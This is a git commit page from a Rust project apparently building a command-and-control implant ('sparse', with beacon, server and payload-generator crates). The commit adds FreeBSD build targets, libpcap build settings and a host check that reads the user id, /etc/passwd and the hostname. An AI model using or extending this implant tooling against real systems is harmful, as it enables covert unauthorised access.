andrew.rioux/sparse
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases 1 Wiki Activity

feat: added FreeBSD support

Browse Source 
to make use of it, create a FreeBSD VM with curl installed and install
rustup by default from rustup.rs, then run `cargo build -p sparse-05-server`
This commit is contained in:
Andrew Rioux 2024-09-18 16:34:33 -04:00
parent 2284480bc5
commit f6428b92fe
Signed by: andrew.rioux
GPG Key ID: 9B8BAC47C17ABB94
10 changed files with 507 additions and 317 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
.gitignore vendored
View File

@ -6,6 +6,7 @@ core
.direnv .direnv
result result
sparse-public sparse-public
rust9x.7z rust9x.7z
rust9x rust9x
sparse-05-freebsd-server
sparse-05/sparse-05-freebsd-server

714
Cargo.lock generated
View File

File diff suppressed because it is too large Load Diff

33
flake.nix
View File

@ -62,16 +62,13 @@
craneLib = (crane.mkLib pkgs).overrideToolchain toolchain; craneLib = (crane.mkLib pkgs).overrideToolchain toolchain;
src = craneLib.cleanCargoSource (craneLib.path ./.); src = craneLib.path ./.;
commonArgs = { commonArgs = {
inherit src; inherit src;
strictDeps = false; strictDeps = false;
CARGO_BUILD_RUSTFLAGS = "-C target-feature=+crt-static";
CARGO_BUILD_TARGET = "x86_64-unknown-linux-musl";
SPARSE_BUILD_LIBPCAP = "${libpcap-src}"; SPARSE_BUILD_LIBPCAP = "${libpcap-src}";
SPARSE_BUILD_LIBNL = "${libnl}"; SPARSE_BUILD_LIBNL = "${libnl}";
@ -81,8 +78,14 @@
doCheck = false; doCheck = false;
}; };
commonLinuxArgs = commonArgs // {
CARGO_BUILD_TARGET = "x86_64-unknown-linux-musl";
CARGO_BUILD_RUSTFLAGS = "-C target-feature=+crt-static";
};
commonWindowsArgs = commonArgs // { commonWindowsArgs = commonArgs // {
CARGO_BUILD_TARGET = "x86_64-pc-windows-gnu"; CARGO_BUILD_TARGET = "x86_64-pc-windows-gnu";
CARGO_BUILD_RUSTFLAGS = "-C target-feature=+crt-static";
SPARSE_BUILD_WINPCAP = "${winpcap}/Lib"; SPARSE_BUILD_WINPCAP = "${winpcap}/Lib";
@ -90,11 +93,11 @@
buildInputs = windowsBuildTools; buildInputs = windowsBuildTools;
}; };
artifacts = craneLib.buildDepsOnly commonArgs; linuxArtifacts = craneLib.buildDepsOnly commonLinuxArgs;
windowsArtifacts = craneLib.buildDepsOnly commonWindowsArgs; windowsArtifacts = craneLib.buildDepsOnly commonWindowsArgs;
sparse-05-linux-server = craneLib.buildPackage (commonArgs // { sparse-05-linux-server = craneLib.buildPackage (commonLinuxArgs // {
inherit artifacts; artifacts = linuxArtifacts;
pname = "sparse-05-linux-server"; pname = "sparse-05-linux-server";
cargoExtraArgs = "-p sparse-05-server --locked"; cargoExtraArgs = "-p sparse-05-server --locked";
@ -115,8 +118,8 @@
cargoExtraArgs = "-p sparse-05-server --locked --features service"; cargoExtraArgs = "-p sparse-05-server --locked --features service";
}); });
sparse-05-client = craneLib.buildPackage (commonArgs // { sparse-05-client = craneLib.buildPackage (commonLinuxArgs // {
inherit artifacts; artifacts = linuxArtifacts;
SPARSE_WINDOWS_SERVER = SPARSE_WINDOWS_SERVER =
"${sparse-05-windows-server}/bin/sparse-05-server.exe"; "${sparse-05-windows-server}/bin/sparse-05-server.exe";
@ -129,22 +132,22 @@
cargoExtraArgs = "-p sparse-05-client --locked"; cargoExtraArgs = "-p sparse-05-client --locked";
}); });
sparse-c2-linux-beacon = craneLib.buildPackage (commonArgs // { sparse-c2-linux-beacon = craneLib.buildPackage (commonLinuxArgs // {
inherit artifacts; artifacts = linuxArtifacts;
pname = "sparse-c2-beacon"; pname = "sparse-c2-beacon";
cargoExtraArgs = "-p sparse-c2-beacon --locked"; cargoExtraArgs = "-p sparse-c2-beacon --locked";
}); });
sparse-c2-server = craneLib.buildPackage (commonArgs // { sparse-c2-server = craneLib.buildPackage (commonLinuxArgs // {
inherit artifacts; artifacts = linuxArtifacts;
pname = "sparse-c2-server"; pname = "sparse-c2-server";
cargoExtraArgs = "-p sparse-c2-server --locked"; cargoExtraArgs = "-p sparse-c2-server --locked";
}); });
sparse-c2-client = craneLib.buildPackage (commonArgs // { sparse-c2-client = craneLib.buildPackage (commonLinuxArgs // {
inherit artifacts; artifacts = linuxArtifacts;
pname = "sparse-c2-client"; pname = "sparse-c2-client";
cargoExtraArgs = "-p sparse-c2-client --locked"; cargoExtraArgs = "-p sparse-c2-client --locked";

27
pcap-sys/build.rs
View File

@ -20,6 +20,32 @@ fn main() {
println!("cargo:rustc-link-search=native={}", std::env::var("SPARSE_BUILD_WINPCAP").unwrap()); println!("cargo:rustc-link-search=native={}", std::env::var("SPARSE_BUILD_WINPCAP").unwrap());
println!("cargo:rustc-link-search=native={}/x64", std::env::var("SPARSE_BUILD_WINPCAP").unwrap()); println!("cargo:rustc-link-search=native={}/x64", std::env::var("SPARSE_BUILD_WINPCAP").unwrap());
println!("cargo:rustc-link-lib=wpcap"); println!("cargo:rustc-link-lib=wpcap");
} else if std::env::var("CARGO_CFG_TARGET_OS").unwrap() == "freebsd" {
let libpcap_src = format!("{}/pcap_src", std::env::var("OUT_DIR").unwrap());
let mut options = CopyOptions::new();
options.copy_inside = true;
options.skip_exist = true;
copy(std::env::var("SPARSE_BUILD_LIBPCAP").unwrap(), &libpcap_src, &options).expect("could not copy libpcap source code to build");
let dst = cmake::Config::new(&libpcap_src)
.profile("MinSizeRel")
.define("BUILD_SHARED_LIBS", "OFF")
.define("DISABLE_BLUETOOTH", "ON")
.define("DISABLE_DAG", "ON")
.define("DISABLE_DBUS", "ON")
.define("DISABLE_DPDK", "ON")
.define("DISABLE_NETMAP", "ON")
.define("DISABLE_RDMA", "ON")
.define("DISABLE_SEPTEL", "ON")
.define("DISABLE_SNF", "ON")
.define("DISABLE_TC", "ON")
.build();
// panic!("hahahahah test {}", dst.display());
println!("cargo:rustc-link-search=native={}/lib", dst.display());
println!("cargo:rustc-link-search=native={}/lib64", dst.display());
println!("cargo:rustc-link-lib=static=pcap");
} else { } else {
let libpcap_src = format!("{}/pcap_src", std::env::var("OUT_DIR").unwrap()); let libpcap_src = format!("{}/pcap_src", std::env::var("OUT_DIR").unwrap());
@ -29,6 +55,7 @@ fn main() {
copy(std::env::var("SPARSE_BUILD_LIBPCAP").unwrap(), &libpcap_src, &options).expect("could not copy libpcap source code to build"); copy(std::env::var("SPARSE_BUILD_LIBPCAP").unwrap(), &libpcap_src, &options).expect("could not copy libpcap source code to build");
let dst = cmake::Config::new(&libpcap_src) let dst = cmake::Config::new(&libpcap_src)
.profile("MinSizeRel")
.define("BUILD_SHARED_LIBS", "OFF") .define("BUILD_SHARED_LIBS", "OFF")
.define("BUILD_WITH_LIBNL", "OFF") .define("BUILD_WITH_LIBNL", "OFF")
.define("DISABLE_BLUETOOTH", "ON") .define("DISABLE_BLUETOOTH", "ON")

5
rust-toolchain.bsd.toml Normal file
View File

@ -0,0 +1,5 @@
[toolchain]
channel = "stable"
components = []
targets = [ "x86_64-unknown-freebsd" ]
profile = "minimal"

6
sparse-05/sparse-05-client/src/commands/generate.rs
View File

@ -12,12 +12,14 @@ pub const SPARSE_LINUX_SERVER_BINARY: &'static [u8] =
#[cfg(not(debug_assertions))] #[cfg(not(debug_assertions))]
pub const SPARSE_LINUX_SERVER_BINARY: &'static [u8] = pub const SPARSE_LINUX_SERVER_BINARY: &'static [u8] =
include_bytes!(std::env!("SPARSE_LINUX_SERVER")); include_bytes!(std::env!("SPARSE_LINUX_SERVER"));
#[cfg(debug_assertions)] #[cfg(debug_assertions)]
pub const SPARSE_WINDOWS_SERVER_BINARY: &'static [u8] = pub const SPARSE_WINDOWS_SERVER_BINARY: &'static [u8] =
include_bytes!("../../../../target/x86_64-pc-windows-gnu/debug/sparse-05-server.exe"); include_bytes!("../../../../target/x86_64-pc-windows-gnu/debug/sparse-05-server.exe");
#[cfg(not(debug_assertions))] #[cfg(not(debug_assertions))]
pub const SPARSE_WINDOWS_SERVER_BINARY: &'static [u8] = pub const SPARSE_WINDOWS_SERVER_BINARY: &'static [u8] =
include_bytes!(std::env!("SPARSE_WINDOWS_SERVER")); include_bytes!(std::env!("SPARSE_WINDOWS_SERVER"));
#[cfg(debug_assertions)] #[cfg(debug_assertions)]
pub const SPARSE_WINDOWS_SERVICE_BINARY: &'static [u8] = pub const SPARSE_WINDOWS_SERVICE_BINARY: &'static [u8] =
include_bytes!("../../../../target/x86_64-pc-windows-gnu/debug/sparse-05-server.exe"); include_bytes!("../../../../target/x86_64-pc-windows-gnu/debug/sparse-05-server.exe");
@ -25,6 +27,9 @@ pub const SPARSE_WINDOWS_SERVICE_BINARY: &'static [u8] =
pub const SPARSE_WINDOWS_SERVICE_BINARY: &'static [u8] = pub const SPARSE_WINDOWS_SERVICE_BINARY: &'static [u8] =
include_bytes!(std::env!("SPARSE_WINDOWS_SERVICE")); include_bytes!(std::env!("SPARSE_WINDOWS_SERVICE"));
pub const SPARSE_FREEBSD_SERVER_BINARY: &'static [u8] =
include_bytes!("../../../sparse-05-freebsd-server");
pub async fn generate(mut name: PathBuf, port: u16, target: TargetOs) -> anyhow::Result<()> { pub async fn generate(mut name: PathBuf, port: u16, target: TargetOs) -> anyhow::Result<()> {
let mut csprng = rand::thread_rng(); let mut csprng = rand::thread_rng();
let keypair = Keypair::generate(&mut csprng); let keypair = Keypair::generate(&mut csprng);
@ -53,6 +58,7 @@ pub async fn generate(mut name: PathBuf, port: u16, target: TargetOs) -> anyhow:
file.write_all(match target { file.write_all(match target {
TargetOs::Linux => SPARSE_LINUX_SERVER_BINARY, TargetOs::Linux => SPARSE_LINUX_SERVER_BINARY,
TargetOs::FreeBSD => SPARSE_FREEBSD_SERVER_BINARY,
TargetOs::Windows => SPARSE_WINDOWS_SERVER_BINARY, TargetOs::Windows => SPARSE_WINDOWS_SERVER_BINARY,
TargetOs::WindowsService => SPARSE_WINDOWS_SERVICE_BINARY TargetOs::WindowsService => SPARSE_WINDOWS_SERVICE_BINARY
}) })

1
sparse-05/sparse-05-client/src/options.rs
View File

@ -16,6 +16,7 @@ fn to_socket_addr(src: &str) -> Result<SocketAddr, std::io::Error> {
pub enum TargetOs { pub enum TargetOs {
Linux, Linux,
FreeBSD,
Windows, Windows,
WindowsService, WindowsService,
} }

1
sparse-05/sparse-05-common/src/lib.rs
View File

@ -96,6 +96,7 @@ pub mod messages {
pub enum OperatingSystem { pub enum OperatingSystem {
Windows, Windows,
Linux, Linux,
FreeBSD
} }
#[derive(Serialize, Deserialize, Debug)] #[derive(Serialize, Deserialize, Debug)]

0
sparse-05/sparse-05-freebsd-server Normal file
View File

34
sparse-05/sparse-05-server/src/capabilities.rs
View File

@ -2,6 +2,7 @@
use std::ffi::c_int; use std::ffi::c_int;
use std::path::PathBuf; use std::path::PathBuf;
use anyhow::Context;
use sparse_05_common::messages::{Capabilities, OperatingSystem, TransportType}; use sparse_05_common::messages::{Capabilities, OperatingSystem, TransportType};
#[derive(Debug)] #[derive(Debug)]
@ -60,7 +61,7 @@ struct cap_user_data_t {
inheritable: u32, inheritable: u32,
} }
#[cfg(target_os = "linux")] #[cfg(any(target_os = "linux", target_os = "freebsd"))]
fn get_username(uid: u32) -> anyhow::Result<Option<String>> { fn get_username(uid: u32) -> anyhow::Result<Option<String>> {
let passwd = std::fs::read_to_string("/etc/passwd")?; let passwd = std::fs::read_to_string("/etc/passwd")?;
@ -118,11 +119,7 @@ fn get_current_capabilities() -> anyhow::Result<SrvCapabilities> {
.ok(); .ok();
Ok(SrvCapabilities { Ok(SrvCapabilities {
operating_system: if cfg!(target_os = "linux") { operating_system: OperatingSystem::Linux,
OperatingSystem::Linux
} else {
OperatingSystem::Windows
},
docker_container, docker_container,
docker_breakout, docker_breakout,
setuid, setuid,
@ -153,6 +150,31 @@ fn get_current_capabilities() -> anyhow::Result<SrvCapabilities> {
}) })
} }
#[cfg(target_os = "freebsd")]
fn get_current_capabilities() -> anyhow::Result<SrvCapabilities> {
let uid = unsafe { libc::getuid() };
let root = uid == 0;
let userent = get_username(uid)?;
let hostname = std::fs::read_to_string("/etc/rc.conf")?
.split("\n")
.map(|line| line.split("=").collect::<Vec<_>>())
.find(|line| line.get(0) == Some(&"hostname"))
.map(|line| line.get(1).map(|name| name.to_string()))
.flatten();
Ok(SrvCapabilities {
operating_system: OperatingSystem::FreeBSD,
docker_container: false,
docker_breakout: false,
setuid: false,
service: false,
root,
userent: userent.clone(),
transport: TransportType::RawUdp,
hostname,
})
}
pub fn get_capabilities() -> anyhow::Result<SrvCapabilities> { pub fn get_capabilities() -> anyhow::Result<SrvCapabilities> {
get_current_capabilities() get_current_capabilities()
} }